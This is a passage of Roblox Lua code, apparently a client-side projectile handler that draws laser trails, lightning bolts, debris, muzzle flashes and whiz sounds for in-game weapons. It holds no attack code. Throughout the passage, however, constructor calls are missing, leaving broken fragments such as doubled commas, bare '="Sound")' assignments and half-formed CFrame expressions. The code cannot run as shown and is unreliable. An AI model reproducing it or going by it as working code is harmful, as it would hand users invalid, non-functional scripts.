CFrame.Angles(math.pi / 2, 0, 0) or CFrame.Angles(0, math.pi / 2, 0)) TrailSegment.Parent = Camera table.insert(Cast.UserData.LaserData.LaserTrailContainer, TrailSegment) if Cast.UserData.LaserData.UpdateLaserTrail then Cast.UserData.LaserData.UpdateLaserTrail:Fire(Cast.UserData.LaserData.LaserTrailId, Cast.UserData.LaserData.LaserTrailContainer) end Thread:Delay(Cast.UserData.LaserData.LaserTrailVisibleTime, function() if Cast.UserData.LaserData.LaserTrailFadeTime > 0 then local DesiredSize = TrailSegment.Size * (Cast.UserData.LaserData.ScaleLaserTrail and, Cast.UserData.LaserData.LaserTrailScaleMultiplier, Cast.UserData.LaserData.LaserTrailScaleMultiplier) or, 1, 1)) local Tween = TweenService:Create(TrailSegment,, Enum.EasingStyle.Linear, Enum.EasingDirection.Out), {Transparency = 1, Size = DesiredSize}) Tween:Play() Tween.Completed:Wait() if TrailSegment then local Index = table.find(Cast.UserData.LaserData.LaserTrailContainer, TrailSegment) if Index then table.remove(Cast.UserData.LaserData.LaserTrailContainer, Index) if Cast.UserData.LaserData.UpdateLaserTrail then Cast.UserData.LaserData.UpdateLaserTrail:Fire(Cast.UserData.LaserData.LaserTrailId, Cast.UserData.LaserData.LaserTrailContainer) end end TrailSegment:Destroy() end else if TrailSegment then local Index = table.find(Cast.UserData.LaserData.LaserTrailContainer, TrailSegment) if Index then table.remove(Cast.UserData.LaserData.LaserTrailContainer, Index) if Cast.UserData.LaserData.UpdateLaserTrail then Cast.UserData.LaserData.UpdateLaserTrail:Fire(Cast.UserData.LaserData.LaserTrailId, Cast.UserData.LaserData.LaserTrailContainer) end end TrailSegment:Destroy() end end end) end end if Cast.UserData.LightningData.LightningBoltEnabled then if Cast.StateInfo.Delta > 0 then local Wideness = Cast.UserData.LightningData.BoltWideness local Width = Cast.UserData.LightningData.BoltWidth local Height = Cast.UserData.LightningData.BoltHeight for _, v in ipairs(Cast.UserData.LightningData.BoltCFrameTable) do local Cache if Cast.UserData.LightningData.BoltShape == "Block" then Cache = BlockSegCache elseif Cast.UserData.LightningData.BoltShape == "Cylinder" then Cache = CylinderSegCache elseif Cast.UserData.LightningData.BoltShape == "Cone" then Cache = ConeSegCache end if Cache then local Start = (, SegmentOrigin + SegmentDirection) * v).p local End = (, LastSegmentOrigin + SegmentDirection) * v).p local Distance = (End - Start).Magnitude local Pos = Start for i = 0, Distance, 10 do local FakeDistance =, End) *, 0, -i - 10) * + (math.random() * Wideness), -2 + (math.random() * Wideness), -2 + (math.random() * Wideness)) local BoltSegment = Cache:GetPart() if Cast.UserData.LightningData.RandomizeBoltColorIn ~= "None" then if Cast.UserData.LightningData.RandomizeBoltColorIn == "Whole" then BoltSegment.Color = Cast.UserData.LightningData.RandomBoltColor elseif Cast.UserData.LightningData.RandomizeBoltColorIn == "Segment" then BoltSegment.Color =, math.random(), math.random()) end else BoltSegment.Color = Cast.UserData.LightningData.BoltColor end BoltSegment.Material = Cast.UserData.LightningData.BoltMaterial BoltSegment.Reflectance = Cast.UserData.LightningData.BoltReflectance BoltSegment.Transparency = Cast.UserData.LightningData.BoltTransparency if i + 10 > Distance then BoltSegment.CFrame =, End) *, 0, -(Pos - End).Magnitude / 2) * (Cast.UserData.LightningData.BoltShape == "Cone" and CFrame.Angles(math.pi / 2, 0, 0) or CFrame.Angles(0, math.pi / 2, 0)) else BoltSegment.CFrame =, FakeDistance.p) *, 0, -(Pos - FakeDistance.p).Magnitude / 2) * (Cast.UserData.LightningData.BoltShape == "Cone" and CFrame.Angles(math.pi / 2, 0, 0) or CFrame.Angles(0, math.pi / 2, 0)) end if i + 10 > Distance then BoltSegment.Size = Cast.UserData.LightningData.BoltShape == "Cone" and, (Pos - End).Magnitude, Height) or - End).Magnitude, Height, Width) else BoltSegment.Size = Cast.UserData.LightningData.BoltShape == "Cone" and, (Pos - FakeDistance.p).Magnitude, Height) or - FakeDistance.p).Magnitude, Height, Width) end Thread:Delay(Cast.UserData.LightningData.BoltVisibleTime, function() if Cast.UserData.LightningData.BoltFadeTime > 0 then local DesiredSize = BoltSegment.Size * (Cast.UserData.LightningData.ScaleBolt and, Cast.UserData.LightningData.BoltScaleMultiplier, Cast.UserData.LightningData.BoltScaleMultiplier) or, 1, 1)) local Tween = TweenService:Create(BoltSegment,, Enum.EasingStyle.Linear, Enum.EasingDirection.Out), {Transparency = 1, Size = DesiredSize}) Tween:Play() Tween.Completed:Wait() if BoltSegment ~= nil then Cache:ReturnPart(BoltSegment) end else if BoltSegment ~= nil then Cache:ReturnPart(BoltSegment) end end end) Pos = FakeDistance.p end end end end end if not Cast.UserData.Replicate and Cast.UserData.ClientModule.WhizSoundEnabled then if not Cast.UserData.Whizzed then local Mag = (Camera.CFrame.p - SegmentOrigin).Magnitude --(Camera.CFrame.p - CosmeticBulletObject.Position).Magnitude if Mag < Cast.UserData.ClientModule.WhizDistance then local WhizSound ="Sound") WhizSound.SoundId = "rbxassetid://"..Cast.UserData.ClientModule.WhizSoundIDs[math.random(1, #Cast.UserData.ClientModule.WhizSoundIDs)] WhizSound.Volume = Cast.UserData.ClientModule.WhizSoundVolume WhizSound.PlaybackSpeed =, Cast.UserData.ClientModule.WhizSoundPitchMax) WhizSound.Name = "WhizSound" WhizSound.Parent = SoundService WhizSound:Play() Debris:AddItem(WhizSound, WhizSound.TimeLength / WhizSound.PlaybackSpeed) Cast.UserData.Whizzed = true end end end Cast.UserData.LastPosition = SegmentOrigin if CosmeticBulletObject == nil then return end CosmeticBulletObject.CFrame = TravelCFrame end local function OnRayTerminated(Cast, RaycastResult, IsDecayed) if Cast.UserData.LaserData.UpdateLaserTrail then Cast.UserData.LaserData.UpdateLaserTrail:Fire(Cast.UserData.LaserData.LaserTrailId, Cast.UserData.LaserData.LaserTrailContainer, true) end if Cast.UserData.BulletParticleData then Cast.UserData.BulletParticleData.Attachment0:Destroy() Cast.UserData.BulletParticleData.Attachment1:Destroy() for _, effect in next, Cast.UserData.BulletParticleData.Effects do effect:Destroy() end end local CosmeticBulletObject = Cast.RayInfo.CosmeticBulletObject if CosmeticBulletObject ~= nil then local CurrentPosition = Cast:GetPosition() local CurrentVelocity = Cast:GetVelocity() if IsDecayed then if Cast.UserData.DebrisData.DecayProjectile then if DebrisCounts <= MaxDebrisCounts then DebrisCounts += 1 local DecayProjectile = CosmeticBulletObject:Clone() DecayProjectile.Name = "DecayProjectile" DecayProjectile.CFrame = CosmeticBulletObject.CFrame DecayProjectile.Anchored = Cast.UserData.DebrisData.AnchorDecay DecayProjectile.CanCollide = Cast.UserData.DebrisData.CollideDecay if not DecayProjectile.Anchored then if Cast.UserData.DebrisData.VelocityInfluence then DecayProjectile.Velocity = DecayProjectile.CFrame.LookVector * CurrentVelocity.Magnitude else DecayProjectile.Velocity = DecayProjectile.CFrame.LookVector * Cast.UserData.DebrisData.DecayVelocity end end for _, v in pairs(DecayProjectile:GetDescendants()) do if ((v:IsA("PointLight") or v:IsA("SurfaceLight") or v:IsA("SpotLight")) and Cast.UserData.DebrisData.DisableDebrisContents.DisableTrail) then v.Enabled = false elseif (v:IsA("ParticleEmitter") and Cast.UserData.DebrisData.DisableDebrisContents.Particle) then v.Enabled = false elseif (v:IsA("Trail") and Cast.UserData.DebrisData.DisableDebrisContents.Trail) then v.Enabled = false elseif (v:IsA("Beam") and Cast.UserData.DebrisData.DisableDebrisContents.Beam) then v.Enabled = false elseif (v:IsA("Sound") and Cast.UserData.DebrisData.DisableDebrisContents.Sound) then v:Stop() end end DecayProjectile.Parent = Camera Thread:Delay(5, function() --10 if DecayProjectile then DecayProjectile:Destroy() end DebrisCounts -= 1 end) end end else if RaycastResult then local HitPointObjectSpace = RaycastResult.Instance.CFrame:pointToObjectSpace(RaycastResult.Position) if Cast.UserData.DebrisData.DebrisProjectile then if DebrisCounts <= MaxDebrisCounts then DebrisCounts += 1 local DebrisProjectile = CosmeticBulletObject:Clone() DebrisProjectile.Name = "DebrisProjectile" DebrisProjectile.CFrame = Cast.UserData.DebrisData.NormalizeDebris and, RaycastResult.Position + RaycastResult.Normal) or (RaycastResult.Instance.CFrame *, HitPointObjectSpace + RaycastResult.Instance.CFrame:vectorToObjectSpace(Cast.UserData.SegmentVelocity.Unit))) --CosmeticBulletObject.CFrame DebrisProjectile.Anchored = Cast.UserData.DebrisData.AnchorDebris DebrisProjectile.CanCollide = Cast.UserData.DebrisData.CollideDebris if not DebrisProjectile.Anchored and Cast.UserData.DebrisData.BounceDebris then local Direction = DebrisProjectile.CFrame.LookVector local Reflect = Direction - (2 * Direction:Dot(RaycastResult.Normal) * RaycastResult.Normal) DebrisProjectile.Velocity = Reflect * (Cast.UserData.DebrisData.BounceVelocity * (CurrentVelocity.Magnitude / AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.BulletSpeed, Cast.UserData.ClientModule.BulletSpeed))) DebrisProjectile.CFrame =, DebrisProjectile.Position + DebrisProjectile.Velocity) end for _, v in pairs(DebrisProjectile:GetDescendants()) do if ((v:IsA("PointLight") or v:IsA("SurfaceLight") or v:IsA("SpotLight")) and Cast.UserData.DebrisData.DisableDebrisContents.DisableTrail) then v.Enabled = false elseif (v:IsA("ParticleEmitter") and Cast.UserData.DebrisData.DisableDebrisContents.Particle) then v.Enabled = false elseif (v:IsA("Trail") and Cast.UserData.DebrisData.DisableDebrisContents.Trail) then v.Enabled = false elseif (v:IsA("Beam") and Cast.UserData.DebrisData.DisableDebrisContents.Beam) then v.Enabled = false elseif (v:IsA("Sound") and Cast.UserData.DebrisData.DisableDebrisContents.Sound) then v:Stop() end end DebrisProjectile.Parent = Camera Thread:Delay(5, function() --10 if DebrisProjectile then DebrisProjectile:Destroy() end DebrisCounts -= 1 end) end end end end CosmeticBulletObject.Transparency = 1 for _, v in pairs(CosmeticBulletObject:GetDescendants()) do if v:IsA("ParticleEmitter") or v:IsA("PointLight") or v:IsA("SurfaceLight") or v:IsA("SpotLight") or v:IsA("Trail") or v:IsA("Beam") or v:IsA("BillboardGui") or v:IsA("SurfaceGui") then v.Enabled = false elseif v:IsA("Sound") then v:Stop() elseif v:IsA("Decal") or v:IsA("Texture") or v:IsA("BasePart") then v.Transparency = 1 end end if Cast.UserData.CastBehavior.CosmeticBulletProvider ~= nil then --Thread:Delay(5, function() -- 10 if CosmeticBulletObject ~= nil then Cast.UserData.CastBehavior.CosmeticBulletProvider:ReturnPart(CosmeticBulletObject) end --end) else Debris:AddItem(CosmeticBulletObject, 5) -- 10 end end end function ProjectileHandler:VisualizeHitEffect(Type, Hit, Position, Normal, Material, ClientModule, Misc, Replicate) if Replicate then VisualizeHitEffect:FireServer(Type, Hit, Position, Normal, Material, ClientModule, Misc) end local ShowEffects = CanShowEffects(Position) if ShowEffects then if Type == "Normal" then MakeImpactFX(Hit, Position, Normal, Material, true, ClientModule, Misc, Replicate, true) elseif Type == "Blood" then MakeBloodFX(Hit, Position, Normal, Material, true, ClientModule, Misc, Replicate, true) end end end function ProjectileHandler:SimulateProjectile(Tool, Handle, ClientModule, Directions, FirePointObject, MuzzlePointObject, Misc, Replicate) if ClientModule and Tool and Handle then if FirePointObject then if not FirePointObject:IsDescendantOf(Workspace) and not FirePointObject:IsDescendantOf(Tool) then return end else return end if Replicate then VisualizeBullet:FireServer(Tool, Handle, ClientModule, Directions, FirePointObject, MuzzlePointObject, Misc) end if MuzzlePointObject then if ClientModule.MuzzleFlashEnabled then for i, v in pairs(Misc.MuzzleFolder:GetChildren()) do if v.ClassName == "ParticleEmitter" then local Count = 1 local Particle = v:Clone() Particle.Parent = MuzzlePointObject if Particle:FindFirstChild("EmitCount") then Count = Particle.EmitCount.Value end Thread:Delay(0.01, function() Particle:Emit(Count) Debris:AddItem(Particle, Particle.Lifetime.Max) end) end end end if ClientModule.MuzzleLightEnabled then local Light ="PointLight") Light.Brightness = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LightBrightness, ClientModule.LightBrightness) Light.Color = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LightColor, ClientModule.LightColor) Light.Range = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LightRange, ClientModule.LightRange) Light.Shadows = ClientModule.LightShadows Light.Enabled = true Light.Parent = MuzzlePointObject Debris:AddItem(Light, ClientModule.VisibleTime) end end local Character = Tool.Parent local IgnoreList = {Camera, Tool, Character} local CastParams = CastParams.IgnoreWater = true CastParams.FilterType = Enum.RaycastFilterType.Blacklist CastParams.FilterDescendantsInstances = IgnoreList local RegionParams = RegionParams.FilterType = Enum.RaycastFilterType.Blacklist RegionParams.FilterDescendantsInstances = IgnoreList RegionParams.MaxParts = 0 RegionParams.CollisionGroup = "Default" ShootId += 1 local LaserTrails = {} local UpdateLaserTrail local LaserTrailEnabled = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailEnabled, ClientModule.LaserTrailEnabled) local DamageableLaserTrail = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.DamageableLaserTrail, ClientModule.DamageableLaserTrail) if Replicate then if LaserTrailEnabled and DamageableLaserTrail then UpdateLaserTrail ="BindableEvent") UpdateLaserTrail.Name = "UpdateLaserTrail_"..HttpService:GenerateGUID() end end for _, Direction in pairs(Directions) do if FirePointObject then if not FirePointObject:IsDescendantOf(Workspace) and not FirePointObject:IsDescendantOf(Tool) then return end else return end local Origin, Dir = FirePointObject.WorldPosition, Direction local HumanoidRootPart = Character:WaitForChild("HumanoidRootPart", 1) local TipCFrame = FirePointObject.WorldCFrame local TipPos = TipCFrame.Position local TipDir = TipCFrame.LookVector local AmountToCheatBack = math.abs((HumanoidRootPart.Position - TipPos):Dot(TipDir)) + 1 local GunRay = - TipDir.Unit * AmountToCheatBack, TipDir.Unit * AmountToCheatBack) local HitPart, HitPoint = Workspace:FindPartOnRayWithIgnoreList(GunRay, IgnoreList, false, true) if HitPart and math.abs((TipPos - HitPoint).Magnitude) > 0 then Origin = HitPoint - TipDir.Unit * 0.1 --Dir = TipDir.Unit end local MyMovementSpeed = HumanoidRootPart.Velocity local ModifiedBulletSpeed = (Dir * AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletSpeed, ClientModule.BulletSpeed)) -- + MyMovementSpeed local CosmeticPartProvider local ProjectileContainer local ProjectileType = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.ProjectileType, ClientModule.ProjectileType) if ProjectileType ~= "None" then local Projectile = Projectiles:FindFirstChild(ProjectileType) if Projectile then local Exist2 = false for _, v in pairs(PartCacheStorage) do if v.ProjectileName == Projectile.Name then Exist2 = true ProjectileContainer = Camera:FindFirstChild("ProjectileContainer_("..Projectile.Name..")") CosmeticPartProvider = v.CosmeticPartProvider break end end if not Exist2 then ProjectileContainer ="Folder") ProjectileContainer.Name = "ProjectileContainer_("..Projectile.Name..")" ProjectileContainer.Parent = Camera CosmeticPartProvider =, 100, ProjectileContainer) table.insert(PartCacheStorage, { ProjectileName = Projectile.Name, CosmeticPartProvider = CosmeticPartProvider }) end end end local PenetrationDepth = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.PenetrationDepth, ClientModule.PenetrationDepth) local PenetrationAmount = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.PenetrationAmount, ClientModule.PenetrationAmount) local PenetrationData if (PenetrationDepth > 0 or PenetrationAmount > 0) then PenetrationData = { PenetrationDepth = PenetrationDepth, PenetrationAmount = PenetrationAmount, PenetrationIgnoreDelay = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.PenetrationIgnoreDelay, ClientModule.PenetrationIgnoreDelay), HitHumanoids = {}, } end local SpinX = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.SpinX, ClientModule.SpinX) local SpinY = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.SpinY, ClientModule.SpinY) local SpinZ = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.SpinZ, ClientModule.SpinZ) local BulletParticleData if AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletParticle, ClientModule.BulletParticle) then local BulletType = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletType, ClientModule.BulletType) if BulletType ~= "None" then local Attachment0 = Bullets[BulletType].Attachment0:Clone() local Attachment1 = Bullets[BulletType].Attachment1:Clone() local Effects = {} Attachment0.Parent = Workspace.Terrain Attachment1.Parent = Workspace.Terrain for _, effect in next, Bullets[BulletType]:GetChildren() do if effect:IsA("Beam") or effect:IsA("Trail") then local eff = effect:Clone() eff.Attachment0 = Attachment0 --Attachment1 eff.Attachment1 = Attachment1 --Attachment0 eff.Parent = Workspace.Terrain table.insert(Effects, eff) end end BulletParticleData = { T0 = nil, P0 = nil, V0 = nil, T1 = os.clock(), P1 =, Origin), V1 = nil, Attachment0 = Attachment0, Attachment1 = Attachment1, Effects = Effects, MotionBlur = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.MotionBlur, ClientModule.MotionBlur), BulletSize = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletSize, ClientModule.BulletSize), BulletBloom = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletBloom, ClientModule.BulletBloom), BulletBrightness = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletBrightness, ClientModule.BulletBrightness), } end end local CastBehavior = FastCast.newBehavior() CastBehavior.RaycastParams = CastParams CastBehavior.TravelType = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.TravelType, ClientModule.TravelType) CastBehavior.MaxDistance = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.Range, ClientModule.Range) CastBehavior.Lifetime = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.Lifetime, ClientModule.Lifetime) CastBehavior.HighFidelityBehavior = FastCast.HighFidelityBehavior.Default --CastBehavior.CosmeticBulletTemplate = CosmeticBullet -- Uncomment if you just want a simple template part and aren't using PartCache CastBehavior.CosmeticBulletProvider = CosmeticPartProvider -- Comment out if you aren't using PartCache CastBehavior.CosmeticBulletContainer = ProjectileContainer CastBehavior.Acceleration = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.Acceleration, ClientModule.Acceleration) CastBehavior.AutoIgnoreContainer = false CastBehavior.HitEventOnTermination = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitEventOnTermination, ClientModule.HitEventOnTermination) CastBehavior.CanPenetrateFunction = CanRayPenetrate CastBehavior.CanHitFunction = CanRayHit local RaycastHitbox = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.RaycastHitbox, ClientModule.RaycastHitbox) local RaycastHitboxData = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.RaycastHitboxData, ClientModule.RaycastHitboxData) CastBehavior.RaycastHitbox = (RaycastHitbox and #RaycastHitboxData > 0) and RaycastHitboxData or nil CastBehavior.CurrentCFrame =, Origin + Dir) CastBehavior.ModifiedDirection =, Origin + Dir).LookVector CastBehavior.Hitscan = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitscanMode, ClientModule.HitscanMode) local LaserTrailId = HttpService:GenerateGUID() if Replicate then if LaserTrailEnabled and DamageableLaserTrail then table.insert(LaserTrails, { Id = LaserTrailId, LaserContainer = {}, HitHumanoids = {}, Terminate = false, }) end end local BoltCFrameTable = {} local LightningBoltEnabled = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LightningBoltEnabled, ClientModule.LightningBoltEnabled) if LightningBoltEnabled then local BoltRadius = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltRadius, ClientModule.BoltRadius) for i = 1, AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltCount, ClientModule.BoltCount) do if i == 1 then table.insert(BoltCFrameTable,, 0, 0)) else table.insert(BoltCFrameTable,, BoltRadius), math.random(-BoltRadius, BoltRadius), 0)) end end end CastBehavior.UserData = { ShootId = ShootId, Tool = Tool, Character = Character, ClientModule = ClientModule, Misc = Misc, Replicate = Replicate, PenetrationData = PenetrationData, BulletParticleData = BulletParticleData, LaserData = { LaserTrailEnabled = LaserTrailEnabled, LaserTrailWidth = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailWidth, ClientModule.LaserTrailWidth), LaserTrailHeight = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailHeight, ClientModule.LaserTrailHeight), LaserTrailColor = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailColor, ClientModule.LaserTrailColor), RandomizeLaserColorIn = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.RandomizeLaserColorIn, ClientModule.RandomizeLaserColorIn), LaserTrailMaterial = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailMaterial, ClientModule.LaserTrailMaterial), LaserTrailShape = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailShape, ClientModule.LaserTrailShape), LaserTrailReflectance = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailReflectance, ClientModule.LaserTrailReflectance), LaserTrailTransparency = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailTransparency, ClientModule.LaserTrailTransparency), LaserTrailVisibleTime = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailVisibleTime, ClientModule.LaserTrailVisibleTime), LaserTrailFadeTime = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailFadeTime, ClientModule.LaserTrailFadeTime), ScaleLaserTrail = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.ScaleLaserTrail, ClientModule.ScaleLaserTrail), LaserTrailScaleMultiplier = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailScaleMultiplier, ClientModule.LaserTrailScaleMultiplier), RandomLaserColor =, math.random(), math.random()), LaserTrailId = LaserTrailId, UpdateLaserTrail = UpdateLaserTrail, LaserTrailContainer = {}, }, LightningData = { LightningBoltEnabled = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LightningBoltEnabled, ClientModule.LightningBoltEnabled), BoltWideness = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltWideness, ClientModule.BoltWideness), BoltWidth = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltWidth, ClientModule.BoltWidth), BoltHeight = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltHeight, ClientModule.BoltHeight), BoltColor = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltColor, ClientModule.BoltColor), RandomizeBoltColorIn = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.RandomizeBoltColorIn, ClientModule.RandomizeBoltColorIn), BoltMaterial = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltMaterial, ClientModule.BoltMaterial), BoltShape = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltShape, ClientModule.BoltShape), BoltReflectance = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltReflectance, ClientModule.BoltReflectance), BoltTransparency = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltTransparency, ClientModule.BoltTransparency), BoltVisibleTime = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltVisibleTime, ClientModule.BoltVisibleTime), BoltFadeTime = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltFadeTime, ClientModule.BoltFadeTime), ScaleBolt = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.ScaleBolt, ClientModule.ScaleBolt), BoltScaleMultiplier = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BoltScaleMultiplier, ClientModule.BoltScaleMultiplier), RandomBoltColor =, math.random(), math.random()), BoltCFrameTable = BoltCFrameTable, }, SpinData = { CanSpinPart = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.CanSpinPart, ClientModule.CanSpinPart), SpinX = SpinX, SpinY = SpinY, SpinZ = SpinZ, InitalTick = os.clock(), InitalAngularVelocity =, SpinY, SpinZ), InitalRotation = (CastBehavior.CurrentCFrame - CastBehavior.CurrentCFrame.p), ProjectileOffset =, }, DebrisData = { DebrisProjectile = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.DebrisProjectile, ClientModule.DebrisProjectile), AnchorDebris = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.AnchorDebris, ClientModule.AnchorDebris), CollideDebris = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.CollideDebris, ClientModule.CollideDebris), NormalizeDebris = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.NormalizeDebris, ClientModule.NormalizeDebris), BounceDebris = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BounceDebris, ClientModule.BounceDebris), BounceVelocity = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BounceVelocity, ClientModule.BounceVelocity), DecayProjectile = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.DecayProjectile, ClientModule.DecayProjectile), AnchorDecay = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.AnchorDecay, ClientModule.AnchorDecay), CollideDecay = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.CollideDecay, ClientModule.CollideDecay), DecayVelocity = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.DecayVelocity, ClientModule.DecayVelocity), VelocityInfluence = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.VelocityInfluence, ClientModule.VelocityInfluence), DisableDebrisContents = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.DisableDebrisContents, ClientModule.DisableDebrisContents), }, BounceData = { CurrentBounces = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.RicochetAmount, ClientModule.RicochetAmount), BounceElasticity = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BounceElasticity, 